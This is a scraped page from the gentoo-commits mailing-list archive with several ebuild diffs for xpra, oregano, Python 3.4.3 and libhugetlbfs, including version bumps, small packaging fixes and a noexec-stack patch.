--- a/x11-wm/xpra/Manifest
+++ b/x11-wm/xpra/Manifest
@@ -2,3 +2,4 @@ DIST xpra-0.14.27.tar.xz 1123504 SHA256 
9d51d6e656a9afc6559ec4b671a706ba134257c8
 DIST xpra-0.15.6.tar.xz 1196700 SHA256 
cebd8d22d4173610258c835f175ad3781cf49bf91b3d6d3c36c35a825228fa32 SHA512 
750b24d06b6af93757e54651c0e5e55192280715c4439e56881824da90dcea25460631c993bf239c6f9023e74dce5063e32688e31c616d036da16fa3da8c304a
 WHIRLPOOL 
66cdc20662ba4251506e03a969332996870e37fe6f60becd3f2feed7b24e1410bc793f5f4679a0dc58940bda52d26563f9db10f8ae3fd83fb60cb89988be38a0
 DIST xpra-0.15.7.tar.xz 1197012 SHA256 
b07ed8708023583788de6b5fec579505c2d13fbe96243e9bd0fd696b66ead8e2 SHA512 
a75c3299b1f3074556440cc2822557564cf48e6a9c2ea061073ccca0ea204578713ece1e43389d0b808bd02cba9646bd161399661b1d52161e497e4406d029fa
 WHIRLPOOL 
e187d25bb6f947b36934f02682ce0d4e091df874f9e3ef25fd261435fd79d3ad5167417ae8e75f167470ac57285d07aa11b6d7d8b51573321569a3a86e2db150
 DIST xpra-0.15.8.tar.xz 1198496 SHA256 
e6ca124c89cfa81c8ee69dd2d746cdb0b4d896af6b369e60abc50d2fd2d2a0d2 SHA512 
0c23bda2ad2ac2355da1e867f3909e13c2146a5f1b0c4903628e1177edb143fb10a57e8cfaada901bf1df0ec71f87356444856405f0f32f99abc1b655d2de636
 WHIRLPOOL 
abc1e6691f459eea0454df870c0c96bf06b628816e2c283090eac467b6c1fbaf0df6e4f7b229c9eb719acdb8630cb441119ce95b6be2b95ac7385c8a0f5bd2e8
+DIST xpra-0.15.9.tar.xz 1199224 SHA256 
bdf51ae3d4114050ff23f7a88fc10af0eb55dd6f74412a6b2c10efeaf6499116 SHA512 
83b3452b45a3fa3ea095cef5d2ed901d754903b9aed20cb5a42e0172e9f7058abd88f8635b36adbf314114a4c396a6478e64611273ac61c369332d8590bcef76
 WHIRLPOOL 
900f5325ebe4ae78b3da214a153961a2c1925ce52f7645ecfcd5254a38f6f942accb263cccfa41eb3b305bef28692ade610e78e17d0c87c1c15b8354656e192b

diff --git a/x11-wm/xpra/xpra-0.15.9.ebuild b/x11-wm/xpra/xpra-0.15.9.ebuild
new file mode 100644
index 000..c5ca308
--- /dev/null
+++ b/x11-wm/xpra/xpra-0.15.9.ebuild
@@ -0,0 +1,115 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+EAPI=5
+
+# PyCObject_Check and PyCObject_AsVoidPtr vanished with python 3.3, and 
setup.py not python3.2 copmat
+PYTHON_COMPAT=( python2_7 )
+inherit distutils-r1 eutils
+
+DESCRIPTION="X Persistent Remote Apps (xpra) and Partitioning WM (parti) based 
on wimpiggy"
+HOMEPAGE="http://xpra.org/ http://xpra.org/src/;
+SRC_URI="http://xpra.org/src/${P}.tar.xz;
+
+LICENSE="GPL-2 BSD"
+SLOT="0"
+KEYWORDS="~amd64 ~x86 ~amd64-linux ~x86-linux"
+IUSE="+client +clipboard csc cups dec_av2 libav opengl pulseaudio server sound 
vpx webp x264 x265"
+
+REQUIRED_USE="${PYTHON_REQUIRED_USE}
+   clipboard? ( || ( server client ) )
+   opengl? ( client )
+   || ( client server )"
+
+# x264/old-libav.path situation see bug 459218
+COMMON_DEPEND=""${PYTHON_DEPS}"
+   dev-python/pygobject:2[${PYTHON_USEDEP}]
+   dev-python/pygtk:2[${PYTHON_USEDEP}]
+   x11-libs/gtk+:2
+   x11-libs/libX11
+   x11-libs/libXcomposite
+   x11-libs/libXdamage
+   x11-libs/libXfixes
+   x11-libs/libXrandr
+   x11-libs/libXtst
+   csc? (
+   !libav? ( >=media-video/ffmpeg-1.2.2:0= )
+   libav? ( media-video/libav:0= )
+   )
+   dec_av2? (
+   !libav? ( >=media-video/ffmpeg-2:0= )
+   libav? ( media-video/libav:0= )
+   )
+   opengl? ( dev-python/pygtkglext )
+   pulseaudio? ( media-sound/pulseaudio )
+   sound? ( media-libs/gstreamer:0.10
+   media-libs/gst-plugins-base:0.10
+   dev-python/gst-python:0.10 )
+   vpx? ( media-libs/libvpx virtual/ffmpeg )
+   webp? ( media-libs/libwebp )
+   x264? ( media-libs/x264
+   !libav? ( >=media-video/ffmpeg-1.0.4:0= )
+   libav? ( media-video/libav:0= )
+   )
+   x265? ( media-libs/x265
+   !libav? ( >=media-video/ffmpeg-2:0= )
+   libav? ( media-video/libav:0= )
+   )"
+
+RDEPEND="${COMMON_DEPEND}
+   dev-python/dbus-python[${PYTHON_USEDEP}]
+   dev-python/ipython[${PYTHON_USEDEP}]
+   dev-python/numpy[${PYTHON_USEDEP}]
+   dev-python/rencode[${PYTHON_USEDEP}]
+   dev-python/pillow[${PYTHON_USEDEP}]
+   virtual/ssh
+   x11-apps/setxkbmap
+   x11-apps/xmodmap
+   server? ( x11-base/xorg-server[-minimal,xvfb]
+   x11-drivers/xf86-input-void
+   x11-drivers/xf86-video-dummy
+   )"

[gentoo-commits] dev/dev-zero:master commit in: profiles/, sci-electronics/oregano/, sci-electronics/oregano/files/

2015-12-14 Thread Tiziano Müller
commit: a664f30685420442a3a376b06f7beb1881cbbefe
Author: Tiziano Müller  gentoo  org>
AuthorDate: Fri Dec 11 12:34:46 2015 +
Commit: Tiziano Müller  gentoo  org>
CommitDate: Mon Dec 14 10:36:19 2015 +
URL:https://gitweb.gentoo.org/dev/dev-zero.git/commit/?id=a664f306

sci-electronics/oregano: version bump

 profiles/categories|  1 +
 sci-electronics/oregano/Manifest   |  1 +
 .../oregano-0.83.2.1-remove-schema-update.patch| 35 ++
 sci-electronics/oregano/metadata.xml   | 13 ++
 sci-electronics/oregano/oregano-0.83.2.1.ebuild| 54 ++
 5 files changed, 104 insertions(+)

diff --git a/profiles/categories b/profiles/categories
index 88fc39e..38fa978 100644
--- a/profiles/categories
+++ b/profiles/categories
@@ -85,3 +85,4 @@ x11-terms
 sys-process
 app-i18n
 sci-chemistry
+sci-electronics

diff --git a/sci-electronics/oregano/Manifest b/sci-electronics/oregano/Manifest
new file mode 100644
index 000..89b0254
--- /dev/null
+++ b/sci-electronics/oregano/Manifest
@@ -0,0 +1 @@
+DIST oregano-0.83.2.1.tar.gz 1545377 SHA256 
d22ab0dc9f3717759983966ea3f7a8cd266e343fab47236ec4d841660bd72fa1 SHA512 
63f5a698476bdbdade9734beacf0879315896b85243daecb7a7593d1bad0fd3ccb537472d1197e3b5623d977f19506f0e561356fd8c21a3146b223ccdc11011d
 WHIRLPOOL 
6f214322fd60b3eeaf704d1a3560c41604884fbe2af7297509086483af8c2d0435e64b70679ede35effc00102c827a3a9b9e8090ad322cdeb49cd5acd9537b0c

diff --git 
a/sci-electronics/oregano/files/oregano-0.83.2.1-remove-schema-update.patch 
b/sci-electronics/oregano/files/oregano-0.83.2.1-remove-schema-update.patch
new file mode 100644
index 000..f6aa055
--- /dev/null
+++ b/sci-electronics/oregano/files/oregano-0.83.2.1-remove-schema-update.patch
@@ -0,0 +1,35 @@
+diff --git a/data/wscript b/data/wscript
+index 9e09004..7a13c75 100644
+--- a/data/wscript
 b/data/wscript
+@@ -30,16 +30,6 @@ def build(bld):
+   bld.install_files (bld.env.path_partslib, 
bld.path.ant_glob('libraries/*.oreglib'))
+   bld.install_files (bld.env.path_ui, 
bld.path.ant_glob('xml/*.ui'))
+ 
+-  try:
+-  bld.exec_command(['update-desktop-database', 
utils.subst_vars('${DATADIR}/applications', bld.env)])
+-  except:
+-  logs.warn('Failed to execute xdg desktop database 
update.')
+-
+-  try:
+-  bld.exec_command(['update-mime-database', 
utils.subst_vars('${DATADIR}/mime', bld.env)])
+-  except:
+-  logs.warn('Failed to execute xdg mime database update.')
+-
+   bld(
+   features  = 'intltool_in',
+   podir = "../po",
+diff --git a/wscript b/wscript
+index 2341045..0aa9d8a 100644
+--- a/wscript
 b/wscript
+@@ -165,6 +165,9 @@ def build(bld):
+   install_path = "${BINDIR}"
+   )
+ 
++  # disable update of schemas cache
++  bld._compile_schemas_registered=True
++
+   for item in exe.includes:
+   logs.debug(item)
+   test = bld.program(

diff --git a/sci-electronics/oregano/metadata.xml 
b/sci-electronics/oregano/metadata.xml
new file mode 100644
index 000..caeaccf
--- /dev/null
+++ b/sci-electronics/oregano/metadata.xml
@@ -0,0 +1,13 @@
+
+http://www.gentoo.org/dtd/metadata.dtd;>
+
+   sci-electronics
+   
+   Oregano is an application for schematic capture and simulation 
of electrical
+   circuits. The actual simulation is performed by Berkeley Spice, 
or GNUcap or
+   the new generation ngspice.
+   
+   
+   marc-lorber/oregano
+   
+

diff --git a/sci-electronics/oregano/oregano-0.83.2.1.ebuild 
b/sci-electronics/oregano/oregano-0.83.2.1.ebuild
new file mode 100644
index 000..a40e085
--- /dev/null
+++ b/sci-electronics/oregano/oregano-0.83.2.1.ebuild
@@ -0,0 +1,54 @@
+# Copyright 1999-2014 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI="5"
+
+inherit eutils fdo-mime vcs-snapshot gnome2-utils waf-utils
+
+DESCRIPTION="Oregano is an application for schematic capture and simulation of 
electrical circuits"
+HOMEPAGE="https://github.com/drahnr/oregano;
+SRC_URI="https://github.com/drahnr/${PN}/tarball/v${PV} -> ${P}.tar.gz"
+
+LICENSE="GPL-2"
+SLOT="0"
+KEYWORDS="~amd64 ~ppc ~x86"
+IUSE=""
+
+CDEPEND="dev-libs/glib:2
+   dev-libs/libxml2:2
+   x11-libs/goocanvas:2.0
+   x11-libs/gtk+:3
+   x11-libs/gtksourceview:3.0
+   app-text/rarian"
+DEPEND="${CDEPEND}
+   virtual/pkgconfig"
+RDEPEND="${CDEPEND}
+   || ( gnome-base/dconf gnome-base/gconf )
+   sci-electronics/electronics-menu"
+
+src_prepare() {
+   epatch "${FILESDIR}/${P}-remove-schema-update.patch"
+}
+
+src_compile() {
+   # needs to be called with either debug or release
+   "${WAF_BINARY}" --verbose --jobs=$(makeopts_jobs) release || 

[gentoo-commits] repo/proj/prefix:master commit in: dev-lang/python/, dev-lang/python/files/

2015-12-14 Thread Fabian Groffen
commit: f9b3e3bea3d0b312b0cc141b44ed1c9715768726
Author: Fabian Groffen  gentoo  org>
AuthorDate: Mon Dec 14 19:13:28 2015 +
Commit: Fabian Groffen  gentoo  org>
CommitDate: Mon Dec 14 19:13:28 2015 +
URL:https://gitweb.gentoo.org/repo/proj/prefix.git/commit/?id=f9b3e3be

dev-lang/python: add python-3.4.3-r5

Package-Manager: portage-2.2.20-prefix

 dev-lang/python/Manifest   |   3 +
 dev-lang/python/files/python-3.4-gcc-5.patch   |  37 ++
 .../files/python-3.4.3-ncurses-pkg-config.patch|  13 +
 dev-lang/python/python-3.4.3-r5.ebuild | 409 +
 4 files changed, 462 insertions(+)

diff --git a/dev-lang/python/Manifest b/dev-lang/python/Manifest
index 57a2f7e..2c0f64a 100644
--- a/dev-lang/python/Manifest
+++ b/dev-lang/python/Manifest
@@ -3,13 +3,16 @@ DIST Python-2.7.11.tar.xz 12277476 SHA256 
962b4c45af50124ea61f11a30deb4342fc0bc2
 DIST Python-2.7.8.tar.xz 10525244 SHA256 
edde10a0cb7d14e2735e682882d5b287028d1485c456758154c19573db68075a SHA512 
0a992e34b6b704f028f5178c0404f8ca5fd9a7ab9da1879a20f0c72ffa712dc4925e45eb78e9368d6a17ee618259fc3f078d71766b314a732a1a28e526511a5e
 WHIRLPOOL 
81ee40be85a8713dcc91e64c7faaf7605c43dc28f97b410b88411bbf7d4adbdf48a3e4bfa18c039c1da8695160a98ebb57e144c3198abec2b12398d80ece2971
 DIST Python-3.2.5.tar.xz 9221624 SHA256 
8ccb9645b9779fc4550055b2ebb21a724ab7a63dee45643286eb4f79b2f84116 SHA512 
6e71d01695c7b1e74d9781e4ac40a8d1560cae659d5351d392fc685b84316568d93740a99d2ed878dd87d4ce1708d0474cb01c6bad7b3dab610c639f3255b09d
 WHIRLPOOL 
d5e5fae5e1d4110861e1e1dac00c9812abbbc37205e8ce3cd268535ab9f66e24038ab4778af8bb834fd472eaa0281730f1f2fabdf6dffc4f6b54ef32c1d75953
 DIST Python-3.3.3.tar.xz 12057744 SHA256 
339275b30a1a3fef1589016bf6302c14e870f7a6fd2522bf87a6c2c6d383c685 SHA512 
6acd905d2ae70a259de1d502c90ce9cc831b03cd32930d55bdce1f6dd4b2657c4bb8698e46f6558253338046c43ee842befa2d62e35eeb82b82659acbe6ea0aa
 WHIRLPOOL 
680a88bc7ca312a71237350c06573d5ed6138d826613a6a8ad9e953181561966c9a9f64b176226a627175b8bb5d13755bb7cabe20ee9510ced5da14185e092a4
+DIST Python-3.4.3.tar.xz 14421964 SHA256 
b5b3963533768d5fc325a4d7a6bd6f666726002d696f1d399ec06b043ea996b8 SHA512 
55b2d7c07da8ad3a3971b4687da2e45809c6f1474732e93b0432f121f287d0b63ad8a9bf381987ea70f47a03d9474c3e55b7d86d14800bf7ef29b3324d8d35b9
 WHIRLPOOL 
f851dedc6a1ea35adec83d60784a5fbcd9dfcf6aa8858bb5ada114fa2ff55add1fbf323ab94ec039ecdedb26d59e8f2e6e171cd9fc1ed41ad9cfa434a555cff3
 DIST python-gentoo-patches-2.7.10-0.tar.xz 12892 SHA256 
c9a838bd62ae50cc385da23a837acfd05f2b74e4f086c9c76eb4d3aa5366ef6d SHA512 
5f100944635e360691dc0a2b340a906646c4ae9ee558246ddffc56e8b15d389f25f1fbdc1db4cc08e7d29560d04d66b058b3904902899d58ecae8c408ebdf056
 WHIRLPOOL 
f69e9a518bb7ee50c1b262a21e70e1e2443f859ee6d2f4fa84421120dbd054a06ce8dd6cfea8512cbc64bce806322b879c25c561d5eb05e1ba6cc15035b373a9
 DIST python-gentoo-patches-2.7.11-0.tar.xz 12916 SHA256 
e14b47bb1fd64d366d7dfb8339cc2cbf4a53fc288b11dd83f575eb36a8a6408d SHA512 
f0447bb699a163afc08df39b111394377539935546ae23732d7239e78d2bff0c04bc94949f86aef0c1be83736127dbd25c2c531e49befed2d638c3cd4940ac52
 WHIRLPOOL 
305992849d9d244da1e308e739c9bf62a3ef5c74eb65c765bdc666fb5767eb16c7a609f7c442c17da17f76c3ab81e4b09fa8c21e43f89366539a6a9d656bea77
 DIST python-gentoo-patches-2.7.8-0.tar.xz 14016 SHA256 
22ca5eab8e1702f220c272c57359f547b753b88d59b53ab95c7985c17f4f90ec SHA512 
17020c8a2039cc073c973e213e77dc67ad9ed4ae7f5fafb931933943aa745733309c46e3972bfde85d112cdef6d47aa91868a614db08bb135c29051999c3df4e
 WHIRLPOOL 
96f0e5c7329cc886d979ec782ffd3c63461f49ba112f0d95e5528d7f15048170cd4e52b78cb4100839d509ef28b927bf7a0f1a610fcf4ec562730a284f8c9fc3
 DIST python-gentoo-patches-3.2.5-1.tar.xz 14628 SHA256 
0acc5531421781ab7f30e6fc8a502f202b79aa285b4f411eb16ea0a9e6d958c1 SHA512 
1abbd53e92466d258802717309e1839ae931b8a4b0a5a27d4d0da748e71cf96ac47c6837bdbae5dd6921a46cee339c178f86ff3108afe95e6a0a42c4f4300791
 WHIRLPOOL 
de003cccb8b311413889713d66b7987f28a1f906cc9642621d1fd2a379ceae4f0f901c137503d808dc3da7295ac611de09781bf8661cdbcd14c1d7c94ba489c2
 DIST python-gentoo-patches-3.3.3-0.tar.xz 12992 SHA256 
38b5c604416947fdd7d87ada2ccd3febf7407f00c1e67e6a99be8765f1b25c49 SHA512 
d803b287c0f407c68dd766974296239419fb35441f1796081681f28d17b1f6c7e50e0aae807ad147469eb586db8fe486a013a166cb76e08f2b7a9ba39acb1760
 WHIRLPOOL 
09a9dbd1831c2e7022f4df27b57435dd1df7eace294e8fa069ce5fa5c1719f64ba9bcd8f27d614a8c13ee8605db37c7e75c13fa14885b76ce289667bf2871aaf
+DIST python-gentoo-patches-3.4.3-0.tar.xz 11736 SHA256 
917a9d98d40a91379c81ea57922a8632ba3c6f6db6f304ed6262bc88c5044946 SHA512 
7ad1b30cf8bb7900fe518ed71e4ee55dd92ce7e23ae583a1f2f851b26cfa8c4f4271d28f418e780f3725a48d4ca8eeb8fd083f850810c66c29fb08c430828d72
 WHIRLPOOL 
074e8c0055b49a028eebda21d1acfb8a25ec968eb8b350c2bed37e042f9f354871e413db13e0ef2fe41d7e56d647178a7b3622019f36c4819c2c68f088366eb1
 DIST python-prefix-2.7.10-gentoo-patches.tar.bz2 16922 SHA256 

[gentoo-commits] repo/gentoo:master commit in: sys-libs/libhugetlbfs/

2015-12-14 Thread Mike Frysinger
commit: 937878643ffaff8e7ef11169caf0c16a774973fe
Author: Mike Frysinger  gentoo  org>
AuthorDate: Mon Dec 14 19:06:21 2015 +
Commit: Mike Frysinger  gentoo  org>
CommitDate: Mon Dec 14 19:22:04 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=93787864

sys-libs/libhugetlbfs: do not gzip manpages

We'll handle compressing of files ourselves, so don't waste time on it.

 sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild | 1 +
 1 file changed, 1 insertion(+)

diff --git a/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild 
b/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild
index f6644a5..4cdb5d4 100644
--- a/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild
+++ b/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild
@@ -28,6 +28,7 @@ src_prepare() {
-e '/^PREFIX/s:/local::' \
-e '1iBUILDTYPE = NATIVEONLY' \
-e '1iV = 1' \
+   -e '/gzip.*MANDIR/d' \
-e "/^LIB\(32\)/s:=.*:= $(get_libdir):" \
-e '/^CC\(32\|64\)/s:=.*:= $(CC):' \
-e "/^PMDIR = .*\/perl5\/TLBC/s::PMDIR = ${VENDOR_LIB}\/TLBC:" \



[gentoo-commits] repo/gentoo:master commit in: sys-libs/libhugetlbfs/

2015-12-14 Thread Mike Frysinger
commit: 90476cb6e896c07ad7867c564cde969f8616ea8c
Author: Mike Frysinger  gentoo  org>
AuthorDate: Mon Dec 14 19:12:31 2015 +
Commit: Mike Frysinger  gentoo  org>
CommitDate: Mon Dec 14 19:22:04 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=90476cb6

sys-libs/libhugetlbfs: fix D-vs-ED handling

 sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild 
b/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild
index 4847854..4eebe01 100644
--- a/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild
+++ b/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild
@@ -51,8 +51,8 @@ src_compile() {
 
 src_install() {
default
-   use static-libs || rm -f "${D}"/usr/$(get_libdir)/*.a
-   rm "${D}"/usr/bin/oprofile* || die
+   use static-libs || rm -f "${ED}"/usr/$(get_libdir)/*.a
+   rm "${ED}"/usr/bin/oprofile* || die
 }
 
 src_test_alloc_one() {



[gentoo-commits] repo/gentoo:master commit in: sys-libs/libhugetlbfs/

2015-12-14 Thread Mike Frysinger
commit: 2e5ed736019cf2fd7e9db25189d1ac6b070337c4
Author: Thomas D  whissi  de>
AuthorDate: Mon Dec 14 19:10:38 2015 +
Commit: Mike Frysinger  gentoo  org>
CommitDate: Mon Dec 14 19:22:04 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=2e5ed736

sys-libs/libhugetlbfs: control python usage during testing

The test code uses python, and only supports py2, so make sure the
ebuild expresses those requirements when the default is py3.

 sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild | 10 +++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild 
b/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild
index 4cdb5d4..4847854 100644
--- a/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild
+++ b/sys-libs/libhugetlbfs/libhugetlbfs-2.19-r1.ebuild
@@ -2,9 +2,11 @@
 # Distributed under the terms of the GNU General Public License v2
 # $Id$
 
-EAPI=5
+EAPI="5"
 
-inherit eutils multilib toolchain-funcs perl-functions
+PYTHON_COMPAT=( python2_7 )
+
+inherit eutils multilib toolchain-funcs perl-functions python-any-r1
 
 DESCRIPTION="easy hugepage access"
 HOMEPAGE="https://github.com/libhugetlbfs/libhugetlbfs;
@@ -15,7 +17,9 @@ SRC_URI="mirror://sourceforge/${PN}/${P}.tar.gz"
 LICENSE="GPL-2"
 SLOT="0"
 KEYWORDS="~amd64 ~ppc64 ~x86"
-IUSE="static-libs"
+IUSE="static-libs test"
+
+DEPEND="test? ( ${PYTHON_DEPS} )"
 RDEPEND="dev-lang/perl:="
 
 src_prepare() {



[gentoo-commits] repo/gentoo:master commit in: sys-libs/libhugetlbfs/, sys-libs/libhugetlbfs/files/

2015-12-14 Thread Mike Frysinger
commit: 8f3aa6dadf4c787c54fabb212d7079c9fa5327a8
Author: Mike Frysinger  gentoo  org>
AuthorDate: Mon Dec 14 19:24:44 2015 +
Commit: Mike Frysinger  gentoo  org>
CommitDate: Mon Dec 14 19:25:40 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=8f3aa6da

sys-libs/libhugetlbfs: version bump to 2.20

 sys-libs/libhugetlbfs/Manifest |   1 +
 .../files/libhugetlbfs-2.20-noexec-stack.patch | 135 +
 sys-libs/libhugetlbfs/libhugetlbfs-2.20.ebuild | 167 +
 3 files changed, 303 insertions(+)

diff --git a/sys-libs/libhugetlbfs/Manifest b/sys-libs/libhugetlbfs/Manifest
index 5a7e936..e91b029 100644
--- a/sys-libs/libhugetlbfs/Manifest
+++ b/sys-libs/libhugetlbfs/Manifest
@@ -1,2 +1,3 @@
 DIST libhugetlbfs-2.18.tar.gz 181275 SHA256 
8c6ed5e884988e0c879a3705455ece153cf805f69cb9c710334e2711acbb6a06 SHA512 
6dcdbf571d6a723a40c15e10b24533f16d65f67fe149aa2d25bee48a034d003419d4cf4b6e55fcd385e1214fc4f6b4dda72ba429b9eea9b38be9b1a393528746
 WHIRLPOOL 
da0b17ca4d2a61be919ea47733b3da485714ce29cdc5e854e143ef0e9c0e45517a37649cb056eeeb74efe8c538f566267152aaad5d53ff837a3a15a9e11070cd
 DIST libhugetlbfs-2.19.tar.gz 181504 SHA256 
a5ecb6e925ab2e491bcaa4049fbd6484740950da47d474e7af06dfc6bd1f690b SHA512 
d21781fe68736eb3bbafeb8f36f4f34d30f290f2f6744b52c1a40161caf2e28b823cd8e9b9c74ec4e6d11f7d398d909f80eb736cc39a64ecc7bf571018bfec7c
 WHIRLPOOL 
bd76e6334acd11e55dec790170781aa418a74e4b1bd0007a15c0b65f5c0f4fd977d02eb89d6b16d48b4e4c7fd980ed2bd7ac9a8246179c0480874afe901da851
+DIST libhugetlbfs-2.20.tar.gz 186750 SHA256 
feb51a17456e6ec9806e78720d4ae17a1211a5db8c9bb4ae654b7251a3f76166 SHA512 
817fca3f8e3b127b9b877e0a03d0a94bf0c3ec481d3becf995986ce6ae0532629c5460100eb9f2ef3452ed59a3b9d3ac8362df8f87b387803c36d35ab7af0902
 WHIRLPOOL 
e6c0244d47cee5966f1a51d7f39ea1cd0f26a7b1698b4471c6813ed9b2f194bc72d4087f62f72f5c2e5d99fcf00226b72b783a993ec39016625106f8ed17baca

diff --git a/sys-libs/libhugetlbfs/files/libhugetlbfs-2.20-noexec-stack.patch 
b/sys-libs/libhugetlbfs/files/libhugetlbfs-2.20-noexec-stack.patch
new file mode 100644
index 000..04c8bae
--- /dev/null
+++ b/sys-libs/libhugetlbfs/files/libhugetlbfs-2.20-noexec-stack.patch
@@ -0,0 +1,135 @@
+https://github.com/libhugetlbfs/libhugetlbfs/pull/9
+
+From 1c41d751d57a598919c40ab9c27514a98da93273 Mon Sep 17 00:00:00 2001
+From: "Robin H. Johnson" 
+Date: Sat, 31 Oct 2009 07:59:57 +
+Subject: [PATCH] set noexec markers in the asm file directly
+
+Using -Wl,-z,noexecstack can hide real exec stack issues coming from other
+files, and is a bit unportable.  Instead, set proper section markers in the
+assembly files directly.  It also means people using the static libraries
+won't have to use -Wl,-z,noexecstack when they link their code.
+---
+ Makefile| 2 +-
+ sys-aarch64elf.S| 4 
+ sys-armelf_linux_eabi.S | 4 
+ sys-elf32ppclinux.S | 4 
+ sys-elf64_s390.S| 4 
+ sys-elf64ppc.S  | 4 
+ sys-elf_i386.S  | 4 
+ sys-elf_s390.S  | 4 
+ sys-elf_x86_64.S| 4 
+ 9 files changed, 33 insertions(+), 1 deletion(-)
+
+diff --git a/Makefile b/Makefile
+index 73ebad7..ca987d9 100644
+--- a/Makefile
 b/Makefile
+@@ -27,7 +27,7 @@ NODEPTARGETS= 
+ 
+ INSTALL = install
+ 
+-LDFLAGS += -Wl,-z,noexecstack -ldl
++LDFLAGS += -ldl
+ CFLAGS ?= -O2 -g
+ CFLAGS += -Wall -fPIC
+ CPPFLAGS += -D__LIBHUGETLBFS__
+diff --git a/sys-aarch64elf.S b/sys-aarch64elf.S
+index 54799d3..210558b 100644
+--- a/sys-aarch64elf.S
 b/sys-aarch64elf.S
+@@ -32,3 +32,7 @@ direct_syscall:
+   mov x6, x7
+   svc 0x0
+   ret
++
++#if defined(__linux__) && defined(__ELF__)
++  .section .note.GNU-stack,"",%progbits
++#endif
+diff --git a/sys-armelf_linux_eabi.S b/sys-armelf_linux_eabi.S
+index dfa7407..265b75d 100644
+--- a/sys-armelf_linux_eabi.S
 b/sys-armelf_linux_eabi.S
+@@ -31,3 +31,7 @@ direct_syscall:
+   swi 0x0
+   ldmfd   sp!, {r4, r5, r6, r7}
+   bx  lr
++
++#if defined(__linux__) && defined(__ELF__)
++  .section .note.GNU-stack,"",%progbits
++#endif
+diff --git a/sys-elf32ppclinux.S b/sys-elf32ppclinux.S
+index 65d8b3f..6ba3f22 100644
+--- a/sys-elf32ppclinux.S
 b/sys-elf32ppclinux.S
+@@ -32,3 +32,7 @@ direct_syscall:
+   mr  8,9
+   sc
+   blr
++
++#if defined(__linux__) && defined(__ELF__)
++  .section .note.GNU-stack,"",%progbits
++#endif
+diff --git a/sys-elf64_s390.S b/sys-elf64_s390.S
+index 425a387..5c31899 100644
+--- a/sys-elf64_s390.S
 b/sys-elf64_s390.S
+@@ -20,3 +20,7 @@ direct_syscall:
+   lgr %r5,%r6
+   svc 0
+   br  %r14
++
++#if defined(__linux__) && defined(__ELF__)
++  .section .note.GNU-stack,"",%progbits
++#endif
+diff --git a/sys-elf64ppc.S b/sys-elf64ppc.S
+index d50f4a6..b57a345 100644
+--- a/sys-elf64ppc.S
 b/sys-elf64ppc.S
+@@ -46,3 +46,7 @@ direct_syscall:
+   mr  

  1   2   >